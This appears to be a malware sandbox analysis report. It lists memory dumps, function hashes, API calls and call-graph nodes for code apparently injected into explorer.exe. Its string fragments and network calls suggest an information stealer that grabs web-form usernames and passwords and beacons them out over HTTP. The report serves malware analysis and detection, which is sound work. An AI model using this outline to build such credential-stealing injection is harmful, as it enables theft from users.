              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 0-871070163
              • Opcode ID: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
              • Instruction ID: c1ac3d1430c5b654c7c720bd93a52d2b674140b5de215feed1962bd9980d021c
              • Opcode Fuzzy Hash: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
              • Instruction Fuzzy Hash: 8C4125317007169FDB21CE29C840B27B7E5EF98715F000A1EFA5AD7790DB31E84A8B91
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0142728C
              Strings
              • RTL: Resource at %p, xrefs: 014272A3
              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01427294
              • RTL: Re-Waiting, xrefs: 014272C1
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 885266447-605551621
              • Opcode ID: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
              • Instruction ID: 7054f2fa225822dde4af37501e61fad5d78da4e837064f67b4bfdc68c9880aaa
              • Opcode Fuzzy Hash: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
              • Instruction Fuzzy Hash: E7411031600326ABD722CF29CC41B26B7A5FBA5715F10061AF945EB3A0DB31E8528BE1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: %%%u$]:%u
              • API String ID: 48624451-3050659472
              • Opcode ID: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
              • Instruction ID: 29cdd1b7ad2176b50c8a595699087541749713fb89703c1eeb08ef207d646bb7
              • Opcode Fuzzy Hash: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
              • Instruction Fuzzy Hash: 85318472A00219AFDB60DE3DCC40FEF77BCEB54654F84055BE949E3250EB709A848BA1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-
              • API String ID: 1302938615-2137968064
              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction ID: b741cee594843c46f6816475e7e011b76d5b36f70382c164fa2da48695b9921c
              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction Fuzzy Hash: 1D91B171E0030A9BEF24DF6DC881ABEBBA5EF44328F54461EEB65E72C0D73099458B11
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: $$@
              • API String ID: 0-1194432280
              • Opcode ID: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
              • Instruction ID: 4a2408a5372249086fbc920484b452fca8ab5367028de4c8a4f784e2cdf99e16
              • Opcode Fuzzy Hash: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
              • Instruction Fuzzy Hash: 9A811B71D002699BDB359B54CC44BEEBBB4AF08714F1041EAEA1DB7690E7705E85CFA0

              Execution Graph

              Execution Coverage:2.3%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:4.7%
              Total number of Nodes:446
              Total number of Limit Nodes:17
              execution_graph 13808 f88714a 13809 f887153 13808->13809 13811 f887174 13808->13811 13810 f889382 ObtainUserAgentString 13809->13810 13813 f88716c 13810->13813 13812 f8871e7 13811->13812 13816 f8821f2 13811->13816 13814 f8820f2 6 API calls 13813->13814 13814->13811 13817 f8822c9 13816->13817 13818 f88220f 13816->13818 13817->13811 13819 f882242 13818->13819 13820 f88cf12 7 API calls 13818->13820 13821 f882289 13819->13821 13823 f883432 NtCreateFile 13819->13823 13820->13819 13821->13817 13822 f8820f2 6 API calls 13821->13822 13822->13817 13823->13821 13932 f88ee0a 13933 f88d942 13932->13933 13934 f88ee45 NtProtectVirtualMemory 13933->13934 13935 f88ee70 13934->13935 13968 f88fa4d 13969 f88fa53 13968->13969 13972 f883782 13969->13972 13971 f88fa6b 13974 f88378f 13972->13974 13973 f8837ad 13973->13971 13974->13973 13975 f888662 6 API calls 13974->13975 13975->13973 13721 f88df82 13723 f88dfb8 13721->13723 13722 f88e022 13723->13722 13724 f88a5b2 socket 13723->13724 13725 f88e081 13723->13725 13724->13725 13725->13722 13726 f88e134 13725->13726 13728 f88e117 getaddrinfo 13725->13728 13726->13722 13727 f88a732 connect 13726->13727 13729 f88e1b2 13726->13729 13727->13729 13728->13726 13729->13722 13730 f88a6b2 send 13729->13730 13732 f88e729 13730->13732 13731 f88e7f4 setsockopt recv 13731->13722 13732->13722 13732->13731 13774 f885dd9 13776 f885df0 13774->13776 13775 f885ecd 13776->13775 13777 f889382 ObtainUserAgentString 13776->13777 13777->13775 13630 f8822dd 13633 f88231a 13630->13633 13631 f8823fa 13632 f882328 SleepEx 13632->13632 13632->13633 13633->13631 13633->13632 13637 f88cf12 13633->13637 13646 f883432 13633->13646 13656 f8820f2 13633->13656 13643 f88cf48 13637->13643 13638 f88d134 13638->13633 13639 f88d0e9 13640 f88d125 13639->13640 13674 f88c842 13639->13674 13682 f88c922 13640->13682 13643->13638 13643->13639 13645 f88d232 NtCreateFile 13643->13645 13662 f88df82 13643->13662 13645->13643 13647 f88345b 13646->13647 13655 f8834c9 
13646->13655 13648 f88d232 NtCreateFile 13647->13648 13647->13655 13649 f883496 13648->13649 13654 f8834c5 13649->13654 13703 f883082 13649->13703 13650 f88d232 NtCreateFile 13650->13655 13652 f8834b6 13652->13654 13712 f882f52 13652->13712 13654->13650 13654->13655 13655->13633 13657 f882109 13656->13657 13658 f8821d3 13656->13658 13717 f882012 13657->13717 13658->13633 13660 f882113 13660->13658 13661 f88df82 6 API calls 13660->13661 13661->13658 13664 f88dfb8 13662->13664 13663 f88e022 13663->13643 13664->13663 13666 f88e081 13664->13666 13690 f88a5b2 13664->13690 13666->13663 13667 f88e134 13666->13667 13669 f88e117 getaddrinfo 13666->13669 13667->13663 13670 f88e1b2 13667->13670 13693 f88a732 13667->13693 13669->13667 13670->13663 13696 f88a6b2 13670->13696 13672 f88e7f4 setsockopt recv 13672->13663 13673 f88e729 13673->13663 13673->13672 13675 f88c86d 13674->13675 13699 f88d232 13675->13699 13677 f88c906 13677->13639 13678 f88c888 13678->13677 13679 f88df82 6 API calls 13678->13679 13680 f88c8c5 13678->13680 13679->13680 13680->13677 13681 f88d232 NtCreateFile 13680->13681 13681->13677 13683 f88c9c2 13682->13683 13684 f88d232 NtCreateFile 13683->13684 13686 f88c9d6 13684->13686 13685 f88ca9f 13685->13638 13686->13685 13687 f88ca5d 13686->13687 13689 f88df82 6 API calls 13686->13689 13687->13685 13688 f88d232 NtCreateFile 13687->13688 13688->13685 13689->13687 13691 f88a60a socket 13690->13691 13692 f88a5ec 13690->13692 13691->13666 13692->13691 13694 f88a788 connect 13693->13694 13695 f88a76a 13693->13695 13694->13670 13695->13694 13697 f88a705 send 13696->13697 13698 f88a6e7 13696->13698 13697->13673 13698->13697 13700 f88d334 13699->13700 13701 f88d25c 13699->13701 13700->13678 13701->13700 13702 f88d410 NtCreateFile 13701->13702 13702->13700 13704 f883420 13703->13704 13705 f8830aa 13703->13705 13704->13652 13705->13704 13706 f88d232 NtCreateFile 13705->13706 13708 f8831f9 13706->13708 13707 f8833df 13707->13652 13708->13707 13709 f88d232 NtCreateFile 
13708->13709 13710 f8833c9 13709->13710 13711 f88d232 NtCreateFile 13710->13711 13711->13707 13713 f882f70 13712->13713 13714 f882f84 13712->13714 13713->13654 13715 f88d232 NtCreateFile 13714->13715 13716 f883046 13715->13716 13716->13654 13718 f882031 13717->13718 13719 f8820cd 13718->13719 13720 f88df82 6 API calls 13718->13720 13719->13660 13720->13719 13860 f885edd 13862 f885f06 13860->13862 13861 f885fa4 13862->13861 13863 f8828f2 NtProtectVirtualMemory 13862->13863 13864 f885f9c 13863->13864 13865 f889382 ObtainUserAgentString 13864->13865 13865->13861 13936 f88fa1f 13937 f88fa25 13936->13937 13940 f8835f2 13937->13940 13939 f88fa3d 13941 f8835fb 13940->13941 13942 f88360e 13940->13942 13941->13942 13943 f888662 6 API calls 13941->13943 13942->13939 13943->13942 13737 f88ee12 13738 f88ee45 NtProtectVirtualMemory 13737->13738 13739 f88d942 13737->13739 13740 f88ee70 13738->13740 13739->13738 13944 f883613 13945 f883620 13944->13945 13946 f883684 13945->13946 13947 f88ee12 NtProtectVirtualMemory 13945->13947 13947->13945 13866 f887cd4 13868 f887cd8 13866->13868 13867 f888022 13868->13867 13872 f887352 13868->13872 13870 f887f0d 13870->13867 13881 f887792 13870->13881 13873 f88739e 13872->13873 13874 f88758e 13873->13874 13875 f8874ec 13873->13875 13877 f887595 13873->13877 13874->13870 13876 f88d232 NtCreateFile 13875->13876 13879 f8874ff 13876->13879 13877->13874 13878 f88d232 NtCreateFile 13877->13878 13878->13874 13879->13874 13880 f88d232 NtCreateFile 13879->13880 13880->13874 13882 f8877e0 13881->13882 13883 f88d232 NtCreateFile 13882->13883 13885 f88790c 13883->13885 13884 f887af3 13884->13870 13885->13884 13886 f887352 NtCreateFile 13885->13886 13887 f887602 NtCreateFile 13885->13887 13886->13885 13887->13885 13844 f88faa9 13845 f88faaf 13844->13845 13848 f88a212 13845->13848 13847 f88fac7 13849 f88a21b 13848->13849 13850 f88a237 13848->13850 13849->13850 13851 f88a0c2 6 API calls 13849->13851 13850->13847 13851->13850 13948 f88922a 13949 f88925e 
13948->13949 13950 f8888c2 ObtainUserAgentString 13949->13950 13951 f88926b 13950->13951 13481 f88ebac 13482 f88ebb1 13481->13482 13515 f88ebb6 13482->13515 13516 f884b72 13482->13516 13484 f88ec2c 13485 f88ec85 13484->13485 13486 f88ec69 13484->13486 13487 f88ec54 13484->13487 13484->13515 13488 f88cab2 NtProtectVirtualMemory 13485->13488 13490 f88ec6e 13486->13490 13491 f88ec80 13486->13491 13489 f88cab2 NtProtectVirtualMemory 13487->13489 13492 f88ec8d 13488->13492 13493 f88ec5c 13489->13493 13494 f88cab2 NtProtectVirtualMemory 13490->13494 13491->13485 13495 f88ec97 13491->13495 13553 f886102 13492->13553 13539 f885ee2 13493->13539 13499 f88ec76 13494->13499 13497 f88ecbe 13495->13497 13501 f88ec9c 13495->13501 13502 f88ecd9 13497->13502 13503 f88ecc7 13497->13503 13497->13515 13545 f885fc2 13499->13545 13520 f88cab2 13501->13520 13506 f88cab2 NtProtectVirtualMemory 13502->13506 13502->13515 13505 f88cab2 NtProtectVirtualMemory 13503->13505 13508 f88eccf 13505->13508 13510 f88ece5 13506->13510 13507 f88ecac 13531 f885de2 13507->13531 13563 f8862f2 13508->13563 13581 f886712 13510->13581 13518 f884b93 13516->13518 13517 f884cce 13517->13484 13518->13517 13519 f884cb5 CreateMutexW 13518->13519 13519->13517 13521 f88cadf 13520->13521 13522 f88cef1 13521->13522 13523 f88cebc 13521->13523 13593 f8828f2 13521->13593 13522->13507 13523->13507 13525 f88ce5c 13526 f8828f2 NtProtectVirtualMemory 13525->13526 13527 f88ce7c 13526->13527 13528 f8828f2 NtProtectVirtualMemory 13527->13528 13529 f88ce9c 13528->13529 13530 f8828f2 NtProtectVirtualMemory 13529->13530 13530->13523 13532 f885df0 13531->13532 13534 f885ecd 13532->13534 13618 f889382 13532->13618 13535 f882412 13534->13535 13537 f882440 13535->13537 13536 f882473 13536->13515 13537->13536 13538 f88244d CreateThread 13537->13538 13538->13515 13541 f885f06 13539->13541 13540 f885fa4 13540->13515 13541->13540 13542 f8828f2 NtProtectVirtualMemory 13541->13542 13543 f885f9c 13542->13543 13544 f889382 
              Call graph (graph image not preserved; only the node labels survived): edges between the dumped functions that reach NtProtectVirtualMemory (via f8828f2 and f88ee12), ObtainUserAgentString (f889382, f888995), NtCreateFile (f88d232, f883082, f882f52, f887352, f887792, f88d410), CreateMutexW (f884cb5), socket (f88a5b2), getaddrinfo (f88e117), connect (f88a732, f88a788), send (f88a6b2), and setsockopt / recv (f88e7f4).

              Control-flow Graph: f88df82-f88e920 (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88a5b2, f88d942, f88a552, f88a732, f88ed62, f88b482, f88ae72, f88f002, f88b042, f88ed92, f88f262, f88a6b2, f88a382, f88a7b2 and the imports getaddrinfo, setsockopt and recv.
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: getaddrinforecvsetsockopt
              • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
              • API String ID: 1564272048-1117930895
              • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
              • Instruction ID: 4ee0617f0ada0a758aaaef213ba5aa49d31a0f1d6c9401e7d0466aaa182c6249
              • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
              • Instruction Fuzzy Hash: CB525D31618B089BDB69FFA8C4847E9B7E1FB54300F50462ED4AFCB146DA34B54ACB91

              Control-flow Graph: f88d232-f88d8cd (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88d942, f88ee92, f88d172 and the import NtCreateFile.
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: CreateFile
              • String ID: `
              • API String ID: 823142352-2679148245
              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
              • Instruction ID: 00c723ef8b97546b1b6f2207209b76a276dd0c49c0fb22507bdd55583ba3deb5
              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
              • Instruction Fuzzy Hash: D7224D71A18F099FCB59EF28C4946EAF7E1FB98305F40062ED45EDB291DB30A452CB81

              Control-flow Graph: f88ee12-f88ee8f (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88d942 and the import NtProtectVirtualMemory.
              APIs
              • NtProtectVirtualMemory.NTDLL ref: 0F88EE67
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: MemoryProtectVirtual
              • String ID:
              • API String ID: 2706961497-0
              • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
              • Instruction ID: 68695919169100be61413d40be98948c9613c28d1035b55f612633d550f3aaff
              • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
              • Instruction Fuzzy Hash: D8019E30668B884F8B88EF6C948416AB7E4FBCA314F000B3EA99AC7251EB64C5424742

              Control-flow Graph: f88ee0a-f88ee8f (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88d942 and the import NtProtectVirtualMemory.
              APIs
              • NtProtectVirtualMemory.NTDLL ref: 0F88EE67
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: MemoryProtectVirtual
              • String ID:
              • API String ID: 2706961497-0
              • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
              • Instruction ID: 3e8cda23d1dd32a9e24537d15d9047e81262b43cf466e5e19d44bf013ec1c96f
              • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
              • Instruction Fuzzy Hash: 0601A234668B884B8B48EB7C94452A6B3E5FBCE314F000B3EE9DAC3241DB65D5024782

              Control-flow Graph (graph not preserved in this export)
              APIs
              • ObtainUserAgentString.URLMON ref: 0F8889A0
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: AgentObtainStringUser
              • String ID: User-Agent: $nt: $on.d$urlmon.dll
              • API String ID: 2681117516-319646191
              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
              • Instruction ID: d43ea991e24da732c58620305bb92735984369d7f6d6782ca871c36ea30fa93a
              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
              • Instruction Fuzzy Hash: DD31BF31614A4C9ECB04FFA8C8847EDB7E1FF98205F40022AD44EDB241DF789646879A

              Control-flow Graph (graph not preserved in this export)
              APIs
              • ObtainUserAgentString.URLMON ref: 0F8889A0
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: AgentObtainStringUser
              • String ID: User-Agent: $nt: $on.d$urlmon.dll
              • API String ID: 2681117516-319646191
              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
              • Instruction ID: e69d68584b83d8604f939e9d41b6e83fd32a8e0bda6b5057892db4c9cbfa1066
              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
              • Instruction Fuzzy Hash: 5321C330610B4C9ECF04FFA8C8447ED7BE1FF58205F40421AD45ADB251DF7896068796

              Control-flow Graph: f884b66-f884cf6 (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88b612, f88d942, f88fda4, f88f022, f88f3e2 and the import CreateMutexW.
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: CreateMutex
              • String ID: .dll$el32$kern
              • API String ID: 1964310414-1222553051
              • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
              • Instruction ID: d43be35701fe8a9083cfd06a747dd8dfbc7491a52bb77235900fac2f7573f357
              • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
              • Instruction Fuzzy Hash: FB417C71918A088FDB54FFA8C8987ED77E1FF98300F40417AC84ADB256EE349946CB85

              Control-flow Graph (graph not preserved in this export)
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: CreateMutex
              • String ID: .dll$el32$kern
              • API String ID: 1964310414-1222553051
              • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
              • Instruction ID: bcc6962ff600a4874bcb407f6f3f2c147e1538a81ae5997d437adf9cc144a8ff
              • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
              • Instruction Fuzzy Hash: F3415A70918A088FDB94EFA8C8987ED77E1FF98300F44416AC84ADB256DE349946CB95

              Control-flow Graph: f88a72e-f88a7ab (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88d942 and the import connect.
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: connect
              • String ID: conn$ect
              • API String ID: 1959786783-716201944
              • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
              • Instruction ID: 70f9250e48ba67af5b26d2846bebbaf8ed50721e65ffd3fca907f0c577b968fa
              • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
              • Instruction Fuzzy Hash: 5E015E30618B188FCB98EF1CE088B55B7E0FB58314F1545AED90DCB266C674D8818BC2

              Control-flow Graph: f88a732-f88a7ab (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88d942 and the import connect.
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: connect
              • String ID: conn$ect
              • API String ID: 1959786783-716201944
              • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
              • Instruction ID: 25990bdcbbf9e331d2bf4c99255472ff1078e2a066be37eb38e6b03cde4ef2ce
              • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
              • Instruction Fuzzy Hash: EB014F70618A1C8FCB98EF5CE488B55B7E0FB59314F1541AEE80DCB266CB74C9818BC2

              Control-flow Graph: f88a6b2-f88a72d (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88d942 and the import send.
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: send
              • String ID: send
              • API String ID: 2809346765-2809346765
              • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
              • Instruction ID: d872af9fc1c771cfd086953f746ee64060d7df00069279e4cb3af22f33bb589f
              • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
              • Instruction Fuzzy Hash: 40015270558A088FCB88EF1CD088B2577E0EB58314F1541AED85DCB267C670D8818B81

              Control-flow Graph: f88a5b2-f88a62b (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88d942 and the import socket.
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: socket
              • String ID: sock
              • API String ID: 98920635-2415254727
              • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
              • Instruction ID: 2eaaa398ab592b1c96003caf5b86c86925e275be6b2138cfacb7479163fd54d5
              • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
              • Instruction Fuzzy Hash: 880121706186188FCB84EF1CD048B54BBE0FB59314F1545AED45EDB266C7B4C981CB86

              Control-flow Graph: f8822dd-f88240e (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88d942, f88cf12, f882e72, f883432, f8820f2 and the import SleepEx, with a loop back to the SleepEx block at f882328.
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
              • Instruction ID: 927ec922dcbbecb1521a6fae5e8776e9fe483df87cb0c7767152b7ab03d8f969
              • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
              • Instruction Fuzzy Hash: A4316C70554B49DEDB68BF2980582E5B7A1FB54301F8442BFC91DCE117C774A052CF92

              Control-flow Graph: f882412-f88247d (rendered graph not preserved; Executed / Not Executed block colouring lost). Blocks call f88d942, f88fc9e and the import CreateThread.
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
              • Instruction ID: 138796a11d6052dfbb0bc7e5a2585d51993b937bf9148ddc80ec0be21e323300
              • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
              • Instruction Fuzzy Hash: 08F0C230268B484FD788EF2CD84566AB3D0EBE8214F44463EA94DC7265DA29C5824716
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
              • API String ID: 0-393284711
              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
              • Instruction ID: 6b1f95104078e9c3fcd5addf3b28c9e46a6870cb96a7ec21a7a57bf67d961c8f
              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
              • Instruction Fuzzy Hash: 0FE16870618F488FDBA5EF68C4847AAB7E0FF58311F404A2E959BC7246DF34A541CB89
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
              • API String ID: 0-2916316912
              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
              • Instruction ID: fe9012f01df85cb2d2816c7120c2f22f3e503bc2fc37fe3e659a6a9fab9a779a
              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
              • Instruction Fuzzy Hash: F8B16930628B488EDB59EF68C485AEEB7F1FF98300F50451ED49AC7252EF74A505CB86
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
              • API String ID: 0-1539916866
              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
              • Instruction ID: a3d00b491dc8b1bdf93dee7f7efdb36227573b42bbcefb1806a62e0c79b486bc
              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
              • Instruction Fuzzy Hash: 9D41B470A18B088FDB14EF88A4456BD7BE2FB48714F40025EE409D3286DBB99D46CBD6
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
